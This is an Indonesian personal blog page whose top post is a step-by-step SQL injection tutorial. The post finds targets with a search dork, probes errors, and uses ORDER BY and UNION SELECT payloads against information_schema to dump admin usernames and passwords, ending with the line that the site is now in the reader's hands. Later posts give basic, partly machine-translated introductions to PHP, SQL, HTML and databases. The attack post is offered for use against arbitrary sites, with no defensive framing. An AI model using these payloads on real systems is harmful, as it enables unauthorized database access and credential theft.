SQL INJECTION.......

Wednesday, May 19, 2010
pengertian sql injection: SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
=========================================
Yang perlu di ketahui sebelum sql injection pada mysql:

karakter: ',-
comments: /*,--
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x
allinurl:news.php?newsid=

============
=step Satu:=
============


carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh: [site]/berita.php?id=100' atau
[site]/berita.php?id=-100


===========
=step Dua:=
===========


mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh: [site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step...
misal: [site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--



============
=step Tiga:=
============

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


=============
=step Empat:=
=============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

seumpama table yang muncul adalah "admin"


============
=step Lima:=
============

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name) ,6,7,8+from+information_schema.tables+where+table_schema=database()--



==============
= step Enam: =
==============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir


[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :http://piclist.com/techref/ascii.htm
http://www.industrialtrainer.com/Unicode.shtm
http://www.dolcevie.com/js/converter.html
http://centricle.com/tools/ascii-hex/ [dan lain sebagainya]

Atau Download Programnya

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E--


=============
=step Tujuh:=
=============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir


[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--



contoh kata yang keluar adalah id,username,password

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--



===============
=step Delapan:=
===============

tahap terakhir mencari halaman admin atau login

selanjutnya terserah anda karena kekuasaan web ada di tangan anda...
Read Full 0 comments

PHP

Friday, November 27, 2009
PHP adalah bahasa pemrograman website yang interpretasinya lebih kepada gratisan biasanya berjalan pada sistem operasi linux (PHP juga bisa dijalankan dengan hosting windows). PHP adalah pilihan alternatif, seperti halnya ASP, PHP juga digabungkan dengan HTML jadi sebelum sebuah halaman website ditampilkan, web server akan memanggil modul dan skrip PHP untuk melakukan proses penampilan datanya.
Php memiliki beberapa ekstensi .php, .php3, .phtml, seperti halnya ASP, PHP juga merupakan aplikasi pemrograman website yang dinamis dan bisa disandingkan dengan berbagai database.
Berikut adalah informasi lainnya yang mungkin Anda butuhkan :
  • Instalasi PLIGG (digg clone) - demo -25/07/2008
  • Drupal, Wordpress, eyeOS di hosting windows - demo -22/07/2008
  • Domain gratis atau subdomain gratis? -22/07/2008
  • Domain dan Subdomain -19/07/2008
  • Aplikasi Email Server -19/07/2008
PHP (PHP: hypertext preprocessor) telah dirancang untuk membuat halaman web dinamis, fokus utama PHP adalah server-side scripting. Sambil menjalankan PHP parser dengan web server dan web browser, maka PHP dapat dibandingkan model lain server-side scripting bahasa seperti sistem Microsoft ASP.NET, Sun Microsystems' JavaServer Pages, mod_perl dan Ruby on Rails kerangka, karena memberikan semua konten dinamis kepada klien dari web server.

Semua termasuk rencana hosting PHP 5, yang meningkat pada PHP 4 di tiga bidang utama:

* Object-oriented programming
* MySQL
* XML

Item telah sepenuhnya ditulis ulang, mereka berpaling dari keterbatasan menjadi bintang atraksi. Meskipun perubahan sendiri menjamin versi baru PHP, PHP 5 juga menyediakan kebanyakan dari fitur-fitur baru lainnya.

1. Dukungan kuat untuk Object-Oriented Programming

PHP 5 menawarkan:

* Constructors
* Destructors
* Umum, dilindungi, dan properti pribadi dan metode
* Antarmuka
* Abstrak kelas
* Kelas jenis hints
* Properti statis dan metode
* Final properti dan metode
* A seluruh suite magis dari metode

Selain itu, kini kedua benda yang ditugaskan dan disahkan oleh referensi bukan oleh nilai, sehingga perlunya bebas percikan ampersands seluruh kode tersebut tidak ada lagi.



2. J Completely rewritten MySQL Ekstensi

Banyak daya pengembang situs web mereka dengan MySQL.

Selain itu, MySQL versi terbaru, 4.1 dan 5.0, memperkenalkan berbagai fitur baru, beberapa perubahan signifikan yang perlu untuk ekstensi. Akibatnya, PHP 5 hadir dengan kompleknya baru MySQL perluasan dan perbaikan. Dubbed MySQLi, untuk MySQL Improved. Ia menawarkan:

* Disusun pernyataan
* Bound input dan output parameter
* Sambungan SSL
* Multi-fungsi permintaan

MySQLi bahkan mengambil keuntungan dari PHP 5 baru berorientasi objek untuk memberikan dukungan OO ke MySQL. Selain itu, versi terbaru dari MySQL sekarang memungkinkan subselects, transaksi, dan replikasi.

3. J Suite dari Interoperable XML Tools

PHP 5 perbaikan masalah utama di PHP 4 dari ekstensi XML. Sedangkan PHP 4 memungkinkan Anda untuk memanipulasi XML, XML tools nya hanya terkait secara dangkal. Setiap alat mencakup salah satu bagian dari XML pengalaman, namun mereka tidak dirancang untuk bekerja sama, dan PHP 4 dukungan untuk lebih maju fitur XML sering setengah-setengah.

Tidak begitu di PHP 5.

XML baru ekstensi:

* Kerja sama sebagai unified keseluruhan.
* Apakah standar pada satu perpustakaan XML: libxml2.
* Layanan sesuai dengan spesifikasi W3.
* Proses data secara efisien.
* Memberikan Anda dengan tepat XML alat untuk pekerjaan Anda.

Selain itu, mengikuti ajaran PHP yang membuat aplikasi web harus mudah, ada yang baru XML ekstensi yang membuatnya mudah untuk membaca dan merubah dokumen XML. Aptly yang bernama SimpleXML ekstensi memungkinkan Anda untuk berinteraksi dengan informasi dalam dokumen XML ini seolah-olah informasi tersebut adalah array dan benda, melalui iterating mereka dengan masing-masing untuk-loops, dan pengeditan di tempat mereka hanya oleh menempatkan variabel ke nilai baru.

Jika Anda tahu format dokumen dari waktu ke depan, seperti ketika Anda parsing RSS file, REST hasil, dan konfigurasi data, SimpleXML adalah cara untuk pergi.

Dan jika Anda seorang Dom fan, Anda akan terkejut senang dengan PHP 5 Dom ekstensi, yang terang-tahun melebihi apa yang anda gunakan di PHP 4.

4. Penanganan Kesalahan cleaner dengan Pengecualian

PHP 5 menawarkan berbeda model memeriksa kesalahan dari apa yang tersedia di PHP 4. It's called pengecualian penanganan. Dengan pengecualian, Anda dibebaskan dari perlunya memeriksa kembali nilai setiap fungsi. Sebagai gantinya, Anda dapat memisahkan logika pemrograman dari kesalahan penanganan dan menempatkan mereka berdampingan di blok kode.

Pengecualian yang umum ditemukan dalam bahasa berorientasi objek seperti Java dan C + +. Bila digunakan judiciously, mereka merampingkan kode, tetapi jika digunakan bagaimanapun juga, mereka membuat spageti kode.

Sekarang, hanya beberapa ekstensi menggunakan PHP pengecualian, tetapi mereka yang sedang perlahan bertahap Akan tetapi, mereka sudah tersedia saat ini untuk menulis kode PHP.

5. J Pertama-Kelas SOAP Pelaksanaan

SOAP adalah komponen kunci dari cepat berkembang layanan web lapangan. Perpanjangan ini memungkinkan para pengembang membuat SOAP klien dengan atau tanpa Web Services Description Language (WSDL) file, dan juga melaksanakan SOAP server di PHP.

PHP 4 dukungan dari SOAP hanya adil. Walaupun ada beberapa SOAP paket, yang paling matang yang ditulis dalam PHP sebagai ganti C. Oleh karena itu, mereka lambat, dan anda harus men-download dan menginstal sendiri.

Dengan PHP 5, ada yang akhirnya berguna SOAP ekstensi yang ditulis dalam C. Saat ini, perpanjangan ini melaksanakan sebagian besar, tapi tidak semua, dari SOAP 1.2. Ini adalah peningkatan signifikan atas sebelumnya C perpanjangan, dan masa depan buah akan ditambahkan dalam waktu.

Khususnya dibandingkan dengan. NET dan Java, PHP SOAP dukungan selalu lagged di belakang melengkung. Apakah Anda suka atau benci SOAP, PHP perlu menawarkan pertama kelas ekstensi SOAP, dan saya bersemangat untuk akhirnya melihat beberapa momentum dalam arah ini.
Read Full 0 comments

Progamming.....

Thursday, October 1, 2009
Sekilas Pengertian Program
Adapun yang dimaksud dengan program adalah kumpulan instruksi yang digunakan untuk mengatur komputer agar melakukan suatu tindakan tertentu. Tanpa program, komputer sesungguhnya tidak dapat berbuat apa-apa. Itulah sebabnya sering dikatakan bahwa komputer mencakup tiga aspek penting, yaitu berupa perangkat keras (hardware), perangkat lunak (software) yang dalam hal ini berupa program, perangkat akal (brainware) atau orang yang berperan dalam operasi komputer maupun pengembangan perangkat lunak (operator). Dengan kata lain, program merupakan salah satu bagian penting pada komputer yang mengatur komputer agar melakukan aksi yang sesuai dengan yang dikehendaki oleh pembuatnya.

Orang yang membuat program biasa disebut pemrogram (programmer). Adapun aktivitas yang berhubungan dengan pembuatan program dinamakan pemrograman (programing).

Suatu program ditulis dengan mengikuti kaidah bahasa pemrograman tertentu. Bahasa pemrograman dapat dianalogikan dengan bahasa yang digunakan manusia (bahasa manusia). Sebagaimana diketahui, ada bermacam-macam bahasa manusia, seperti bahasa Inggris, Indonesia, ataupun bahasa yang lainnya. Kumpulan instruksi dalam bahasa manusia yang berupa sejumlah kalimat dapat kita analogikan dengan suatu program. Manusia dapat mengerjakan suatu instruksi berdasarkan kalimat-kalimat dan komputer dapat menjalankan suatu instruksi menurut program.


SQL (Structured Query Language) adalah bahasa komputer yang ditujukan untuk menyimpan, memanipulasi, dan mengambil data yang disimpan dalam database relasional. Inkarnasi pertama SQL muncul di tahun 1974, ketika sebuah kelompok di IBM mengembangkan prototipe pertama dari sebuah database relasional. Komersial pertama database relasional dirilis oleh Relational Software (kemudian menjadi Oracle).

SQL standar ada. Namun, SQL yang dapat digunakan pada masing-masing dari RDBMS utama saat ini dalam berbagai rasa. Hal ini disebabkan oleh dua alasan: 1) standar SQL yang cukup rumit, dan tidak praktis untuk menerapkan seluruh standar, dan 2) masing-masing vendor database membutuhkan cara untuk membedakan produk dari orang lain. Dalam tutorial ini, perbedaan-perbedaan seperti dicatat di mana perlu.

SQL ini berisi daftar situs bantuan pemrograman umum digunakan statemen SQL, dan dibagi menjadi bagian berikut:
SQL Commands: Basic SQL statement untuk menyimpan, mengambil, dan memanipulasi data dalam database relasional.
Tabel Manipulasi: Bagaimana pernyataan SQL digunakan untuk mengelola tabel dalam database.
Advanced SQL: Advanced SQL perintah.
SQL Syntax: Sebuah halaman yang berisi daftar sintaks untuk semua perintah SQL dalam tutorial ini.

Untuk setiap perintah, sintaks SQL terlebih dahulu akan disajikan dan dijelaskan, diikuti oleh sebuah contoh. Pada akhir tutorial ini, Anda harus memiliki pemahaman umum yang baik sintaks SQL, dan dapat menulis SQL query menggunakan sintaks yang benar. Pengalaman saya adalah bahwa pemahaman dasar-dasar SQL adalah jauh lebih mudah daripada menguasai semua seluk-beluk bahasa database ini, dan saya harap Anda akan mencapai kesimpulan yang sama juga.
Read Full 0 comments

HTML....

Wednesday, September 23, 2009

HTML berupa kode-kode tag yang menginstruksikan browser untuk menghasilkan tampilan sesuai dengan yang diinginkan. Sebuah file yang merupakan file HTML dapat dibuka dengan menggunakan browser web seperti Mozilla Firefox atau Microsoft Internet Explorer. HTML juga dapat dikenali oleh aplikasi pembuka email ataupun dari PDA dan program lain yang memiliki kemampuan browser. HTML dokumen tersebut mirip dengan dokumen teks biasa, hanya dalam dokumen ini sebuah teks bisa memuat instruksi yang ditandai dengan kode atau lebih dikenal dengan TAG tertentu. Sebagai contoh jika ingin membuat teks ditampilkan menjadi tebal seperti: TAMPIL TEBAL, maka penulisannya dilakukan dengan cara: TAMPIL TEBAL. Tanda digunakan untuk mengaktifkan instruksi cetak tebal, diikuti oleh teks yang ingin ditebalkan, dan diakhiri dengan tanda untuk menonaktifkan cetak tebal

Html adalah sebuah bahasa pemrograman yg di gunakan untuk membuat web statis di dalamnya di pelajari cara memformat teks,memasukan gambar,membuat form,membuat frame,membuat link dan masih banyak lagi. Kekurangan dari html adalah tidak bisa menyimpan sebuah comment dari pengunjung. Maka dari itu di ciptakan script php dan mysql yg dpt di padukan dg html sehingga bisa menjadi web yg dinamis
Read Full 0 comments

Query

Friday, September 18, 2009
Dalam tutorial MySQL sebelumnya, kamu dah belajar tentang database kan? Nah dalam dunia praktek sehari-hari kamu bakalan jarang tuh make teori database. Kamu akan banyak berhubungan dengan yang namanya Query. Ingat, Query merupakan senjata utama kamu dalam bekerja sehari-hari dengan database. Kalau mau belajar MySQL, pelajari dulu tuh Query. Siap untuk mempelajari Query? Keep reading guys...

Query merupakan istilah yang digunakan untuk menyatakan berbagai perintah SQL. Setiap perintah melakukan beberapa hal terhadap database. Sebagai contoh, perintah CREATE akan membuat tabel dan database, sedangkan SELECT akan memilih baris-baris yang sudah pernah kamu sisipkan dalam database. Kita akan mendalami secara detil nantinya, namun untuk tahap awal, kita akan coba review beberapa struktur Query.


Konstruksi Query dimulai dengan salah satu perintah berikut:


*
ADD
*
DROP
*
CREATE
*
INSERT
*
SELECT
*
UPDATE
*
REPLACE
*
DELETE


Query memiliki banyak kelonggaran dalam penulisannya. Spasi dan Enter gak begitu diperhatiken dalam penulisannya. Artinya kalau kebetulan salah tulis spasinya kebanyakan, ndak masalah. Gitu.
Read Full 0 comments

SQL????

SQL (dibaca "ess-que-el") merupakan kependekan dari Structured Query Language. SQL digunakan untuk berkomunikasi dengan sebuah Database. Sesuai dengan ANSI,SQL merupakan bahasa standar untuk sistem menajemen database relasional. Statemen SQL digunakan untuk melakukan tugas-tugas seperti melakukan update terhadap database, atau mengambil data dari sebuah database. Beberapa database relasional yang menggunakan SQL dan cukup ngetop adalah: MySQL, Oracle, Sybase, Microsoft SQL Server, Access, Ingres, etc. Meskipun sebagian besar sistem database menggunakan SQL, namun sebagian besar dari mereka juga memiliki ekstensi khusus yang hanya bisa digunakan di sistem masing-masing. Namun demikian, perintah standar SQL seperti "Select", "Insert", "Update", "Delete", "Create", dan "Drop" dapat digunakan untuk melakukan hampir semua hal yang perlu dilakukan terhadap sebuah database. Tutorial ini akan mengenalkan kamu pada penggunaan dasar dari perintah tersebut. Kamu bisa praktek dengan menginstal MySQL atau database lain di komputer kamu.
Read Full 0 comments

Mengapa menggunakan Database?????

Database akan menjadi sangat berguna saat kamu perlu menyimpan informasi yang dikategorikan secara logis. Contoh, katakanlah kamu ingin menyimpan informasi tentang semua karyawan pada sebuah perusahaan. Dengan database, kamu bisa mengelompokkan berbagai hal dalam bisnis menjadi beberapa tabel. Contoh tabelnya bisa saja tabel penjualan, karyawan, piutang, kinerja, dll.
Read Full 0 comments
 

web lainya

About Me

My photo
surabaya, jawa timur, Indonesia

Yang ngeliat blogku.....

Support By

Banner Link Sobat



kata-irhamna


Valliant

Traffic



© 3 Columns Newspaper Copyright by Progamming | Template by Blogger Templates | Blog Trick at Blog-HowToTricks